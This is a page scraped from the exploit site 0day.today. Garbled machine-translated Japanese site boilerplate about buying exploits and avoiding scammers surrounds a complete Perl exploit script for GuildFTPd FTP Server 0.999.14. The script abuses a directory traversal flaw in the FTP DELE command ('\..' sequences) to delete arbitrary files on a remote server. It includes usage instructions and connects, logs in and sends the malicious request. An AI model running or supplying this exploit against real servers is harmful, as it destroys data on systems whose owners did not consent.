0day.today - 最大、世界でのデータベースを利用します。
あなたは0day.today について知っておくべきこと:
ログイン このサイトの管理者が使用しています公式の連絡先.詐欺師にご注意!
- 私たちは一つのメインのドメインを使用します。http://0day.today
- 材料のほとんどは 完全に無料
- あなたがしたい場合は エクスプロイトを購入 / V.I.P.を取得アクセス または任意の他のサービスのために支払います、
あなたが購入したり、獲得する必要があります 金
ログイン このサイトの管理者が使用しています公式の連絡先.詐欺師にご注意!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
次の方法でご連絡することができます:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
GuildFTPd FTP Server 0.999.14 Remote Delete Files Exploit
========================================================= GuildFTPd FTP Server 0.999.14 Remote Delete Files Exploit ========================================================= #!/usr/bin/perl # Exploit: GuildFTPd FTP Server Version 0.x.x Remote Delete Files # # # 2) A vulnerability is caused due to an input validation error when handling FTP "DELE" # requests. This can be exploited to escape the FTP root and delete arbitrary files on # the system via directory traversal attacks using the "\.." character sequence. use IO::Socket; print "[+] Author : Jonathan Salwan \n"; print "[+] Soft: Guild FTP Server V0.x.x\n"; print "[+] Exploit: Remote Delete File\n"; if (@ARGV < 5) { print "[*] Usage: <guildftp.pl> <host> <port> <login> <password> <file>\n"; print "[*] Exemple: guildftp.pl 127.0.0.1 21 jonathan salwan ..\\\\test.txt\n"; exit; } $ip = $ARGV[0]; $port = $ARGV[1]; $user = $ARGV[2]; $pass = $ARGV[3]; $file = $ARGV[4]; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "\n[-] Connecting: Failed!\n"; print "\n[+] Connecting: Ok!\n"; print "[+] Sending request...\n"; print $socket "USER $user\n"; print $socket "PASS $pass\n"; print $socket "DELE $file\n"; sleep(5); close($socket); print "[+]Done!\n"; # 0day.today [2024-07-01] #